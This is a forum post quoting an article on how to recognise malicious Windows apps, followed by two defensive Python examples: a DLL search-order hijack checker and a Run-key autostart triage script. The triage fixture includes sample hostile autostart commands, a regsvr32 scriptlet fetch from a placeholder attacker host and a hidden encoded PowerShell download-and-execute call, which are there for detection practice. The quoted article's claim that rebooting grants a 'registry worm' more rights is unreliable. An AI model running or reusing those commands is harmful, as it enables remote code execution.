What is a Malicious App and How to Spot One?
Quote:

Malicious App Definition. Blacklisting and Whitelisting Apps. Protecting Your Assets against Malicious Apps

We’re all familiar with terms such as “threat-hunting”, “boots-on-the-ground intelligence” or “DNS traffic filtering.” Going back to one’s roots is always a good idea and today I’ll do just that. This article is dedicated to malicious applications. Indeed, we are going to talk about the malicious app definition, what makes an app malicious, typical behavioral patterns, and how to protect your digital assets against malicious applications. As always, stay safe and enjoy your Friday afternoon read.

Defining Malicious Applications

So, what is a malicious application? According to the paper “The World of Malware: An Overview”, malware is defined as:
 
Quote:“a program code that is hostile and often used to corrupt or misuse a system. Introducing malware into a computer network environment has different effects depending on the design intent of the malware and the network layout. Malware detection and prevention systems are bypassed by malicious files in computer systems as malware becomes more complex and large in numbers”.

Mind you, this definition is not all-encompassing, mostly because it does not factor in pseudo-malicious endeavors such as hacktivism. Anyway, from this definition we can infer the following aspects related to malicious apps:
  • A malicious app is a software or piece of code designed for nefarious purposes. As practice shows us, these purposes can range from recon (i.e., gathering intel on a designated target to track movement and identify vulnerabilities) to intentionally damaging tangible or intangible assets (i.e., pre-attack actions undertaken to weaken cyber-defenses).
  • A malicious application has evasion capabilities. As you know, most of the apps we have installed on our endpoints are digitally-signed and are, as we say, out there in the open. Malicious apps use various TTPs (Tactics, Techniques, and Procedures) to evade digital signature enforcement or even to masquerade as legitimate applications. Obfuscation, as it is called in cybersecurity, is an important property of malware. Without it, even the most basic antivirus or firewall, or antimalware solution can detect the malicious app.
  • Malicious apps are protean in nature. In the malware world, continuous evolution equals survival. If malware developers (hackers) cannot keep up with all the developments in cybersecurity, their creations become utterly useless.
So, by design, malicious apps are ‘slingshotted’ into the open with the intent of harming, eavesdropping or softening up defenses. Now, the question at hand here is how do we identify malicious applications? Studying their behavior might give us some clues. Let’s take a look at some of them.

Typical Malicious Behavior

Here are some of the most common behavioral patterns of malicious applications.

Grabbing credentials

Any application that is designed to extract credentials through packet sniffing, keylogging, ‘dumpster diving’ or other methods can be considered malicious. Of course, the best defense would be to deploy and use an efficient antimalware solution.

Process injection

Any type of activity that supersedes normal system processes by introducing malicious binaries or code pieces should be labeled as malicious. The ‘most’ targeted system processes are regsvr32.exe and svchost.exe.

Dynamic-Link Library injection and/or replacement

Any type of action undertaken to externally manipulate a functioning DLL (i.e., writing a path to a DLL found inside an app’s process and then executing malicious code via a remote-controlled thread) is considered malicious behavior. In some cases, the legit DLLs can be swapped with fake (and malicious) processes. This is called DLL replacement.

Hook injection

In some instances, attackers might use the hook injection technique in order to gain access to core memory functions. This technique involves loading and running a piece of malicious code inside the environment of a running program.

Registry persistence

It’s not uncommon for a previously removed program to linger in the Windows registry. Of course, these ‘breadcrumbs’ can be successfully cleared with tools such as CCleaner, AVG PC Tune-up Utilities, or CleanMyPC. However, when those bits won’t go away and they start modifying registry keys or values, you might have a malicious app on your hands. Word of caution: do not reboot or shut down your PC if you have a registry ‘worm’. Doing so will only grant the malicious app more rights.

‘Trojanizing’ commonly used system binaries

Although an uncommon malicious technique, it’s deadly efficient and quite hard to detect and root out. The purpose of this action is to compromise commonly used system binaries, effectively turning them into bit-sized trojans. This is achieved through fake patching. Once the fake binaries are loaded and run, they will grant hackers access to key memory areas.

Hijacking the DLL load order

Every time your computer boots, the OS will start looking for DLLs. Why? Because executables love DLLs and DLLs relish executables. This is done, of course, in a certain order. Here’s the catch: if the path to a specific DLL is not hard-coded (i.e., set in stone), a malicious piece of code can be introduced in this search order, which would result in the executable loading it.
...
Continue Reading
Reply
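The “Hijacking the DLL load order” section of the quoted article describes the search order only in passing. The script below is an added worked example (not code from the Heimdal article or the forum post): it models the default Windows search order for a DLL loaded by bare name (application directory, System32, the 16-bit System directory, the Windows directory, the current directory, then each PATH entry, which is the documented order with SafeDllSearchMode enabled), walks it for each import of a constructed executable, and reports where an attacker with write access could plant a same-named DLL that the loader would find first. The file system contents, the import list, the writable-directory set and the KnownDLLs subset are all constructed in memory and are assumptions of the example, so it runs offline and touches no real host.

```python
"""Model the Windows DLL search order and flag hijack opportunities.

Added example, not code from the quoted Heimdal article. The search order
is the documented default when SafeDllSearchMode is enabled; the file
system, import lists and writable-directory set below are constructed
in memory, so the script runs offline and touches no real host.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"

# KnownDLLs are mapped straight from System32 and never searched for.
# The real list lives under HKLM\...\Session Manager\KnownDLLs; this
# subset is assumed for the example.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll"}


def search_order(app_dir: str, cwd: str, path_dirs: List[str]) -> List[str]:
    """Directories probed, in order, for a DLL loaded by bare name."""
    return [app_dir, SYSTEM32, SYSTEM16, WINDIR, cwd] + list(path_dirs)


@dataclass
class Finding:
    dll: str
    resolved_from: Optional[str]   # None = phantom DLL, never found anywhere
    plantable_in: List[str]        # writable dirs probed before the real hit


def analyze(app_dir: str, imports: List[str], fs: Dict[str, Set[str]],
            writable: Set[str], cwd: str, path_dirs: List[str]) -> Dict[str, Finding]:
    """Walk the search order for each import and record where an attacker
    could drop a same-named DLL that the loader would pick up first."""
    results: Dict[str, Finding] = {}
    for dll in imports:
        name = dll.lower()
        if name in KNOWN_DLLS:
            results[name] = Finding(name, SYSTEM32, [])
            continue
        plantable: List[str] = []
        resolved: Optional[str] = None
        for directory in search_order(app_dir, cwd, path_dirs):
            present = {f.lower() for f in fs.get(directory, set())}
            if name in present:
                resolved = directory
                break
            if directory in writable:
                plantable.append(directory)
        results[name] = Finding(name, resolved, plantable)
    return results


def report(results: Dict[str, Finding], writable: Set[str]) -> List[str]:
    """Human-readable verdicts; an empty list means nothing to worry about."""
    lines = []
    for f in results.values():
        if f.resolved_from is None:
            lines.append(f"{f.dll}: phantom DLL, plantable in {f.plantable_in}")
        elif f.resolved_from in writable:
            lines.append(f"{f.dll}: loads from user-writable {f.resolved_from}")
        elif f.plantable_in:
            lines.append(f"{f.dll}: hijackable via {f.plantable_in} before {f.resolved_from}")
    return lines


# --- constructed scenario: an editor installed into a user-writable folder ---
APP_DIR = r"C:\Tools\Editor"
CWD = r"C:\Users\alice\Downloads"
USER_BIN = r"C:\Users\alice\bin"
FAKE_FS = {
    SYSTEM32: {"kernel32.dll", "ntdll.dll", "version.dll", "dbghelp.dll"},
    APP_DIR: {"editor.exe", "plugin.dll"},
}
WRITABLE = {APP_DIR, CWD, USER_BIN}
PATH_DIRS = [SYSTEM32, WINDIR, USER_BIN]
IMPORTS = ["kernel32.dll", "version.dll", "plugin.dll", "missing.dll"]


def run_scenario() -> Dict[str, Finding]:
    return analyze(APP_DIR, IMPORTS, FAKE_FS, WRITABLE, CWD, PATH_DIRS)


if __name__ == "__main__":
    for line in report(run_scenario(), WRITABLE):
        print(line)
```

Three outcomes fall out of the model: `version.dll` exists in System32 but the application directory is probed first and is writable, so a planted copy wins; `plugin.dll` already loads from the writable application directory; `missing.dll` is a phantom import that would be satisfied by the first writable directory in the order, including the current directory and a user-controlled PATH entry. The fix in each case is the same: install into a directory standard users cannot write to, and load DLLs by full path (or via `SetDefaultDllDirectories`) rather than by bare name.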
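The “Registry persistence” section of the quoted article, and its mention of regsvr32.exe under “Process injection”, leave open how one actually looks at autostart entries. The following is an added example (not code from the Heimdal article or the forum post) that parses a `.reg` export of the `Run`/`RunOnce` keys and triages each command line on a few signals an analyst would check first: whether the binary lives in a user-writable directory, whether a signed system launcher such as regsvr32.exe, rundll32.exe or powershell.exe is doing the starting, whether the command references a URL, and whether it carries an encoded PowerShell payload. The export text, host names, paths and the base64 string are constructed for the example; the signals are starting points for follow-up (signature check, hash lookup, parent process), not verdicts, which is why a legitimate per-user application such as OneDrive in `AppData` also gets flagged.

```python
"""Triage Run/RunOnce autostart entries from a .reg export.

Added example, not code from the quoted Heimdal article. The export text
is constructed for the example (the host, paths and values are made up);
the heuristics are signals for an analyst to follow up, not verdicts.
"""
import re
from typing import Dict, List, Tuple

RUN_KEYS = (
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
)
# Locations a standard user can write to. A legitimate per-user app may
# live here too (OneDrive does), which is why this is a signal, not a verdict.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                 "\\programdata\\", "\\users\\public\\")
# Signed system binaries commonly abused as launchers for hostile payloads.
LAUNCHERS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
             "cscript.exe", "powershell.exe", "cmd.exe"}
# -e / -enc / -EncodedCommand followed by a long base64 blob.
ENCODED_PS = re.compile(r"(?<!\S)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}", re.I)
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def unescape(s: str) -> str:
    """.reg files escape backslash and double quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value_name, string_value) for REG_SZ entries.
    Default values (@=) and hex() types are skipped for brevity."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_LINE.match(line)
        if m and key is not None:
            name, rhs = m.group(1), m.group(2)
            if len(rhs) >= 2 and rhs[0] == '"' and rhs[-1] == '"':
                entries.append((key, unescape(name), unescape(rhs[1:-1])))
    return entries


def executable_of(cmd: str) -> str:
    """First token of a command line, honouring a quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end != -1 else cmd[1:]
    return cmd.split(" ", 1)[0]


def triage(entries: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Map each autostart value name to the reasons it deserves a look."""
    findings: Dict[str, List[str]] = {}
    for key, name, cmd in entries:
        if not any(key.lower().endswith(k.lower()) for k in RUN_KEYS):
            continue
        exe = executable_of(cmd)
        exe_name = exe.rsplit("\\", 1)[-1].lower()
        reasons = []
        if any(w in exe.lower() for w in USER_WRITABLE):
            reasons.append("runs from a user-writable directory")
        if exe_name in LAUNCHERS:
            reasons.append(f"uses {exe_name} as a launcher")
        if re.search(r"https?://", cmd, re.I):
            reasons.append("references a URL")
        if ENCODED_PS.search(cmd):
            reasons.append("encoded PowerShell command")
        findings[name] = reasons
    return findings


# Constructed export (not from a real machine); attacker.invalid is a placeholder host.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="C:\\Users\\alice\\AppData\\Roaming\\svc\\update.exe"
"Helper"="regsvr32.exe /s /u /i:http://attacker.invalid/x.sct scrobj.dll"
"Sync"="powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"""

if __name__ == "__main__":
    for name, reasons in triage(parse_reg(SAMPLE_REG)).items():
        print(f"{name:15} {'; '.join(reasons) or 'nothing notable'}")
```

On a live system the same export is produced with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` and fed to `parse_reg`; the `Run` keys are only the most common autostart location, so a full sweep also covers services, scheduled tasks, Winlogon and the other locations that tools such as Autoruns enumerate.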

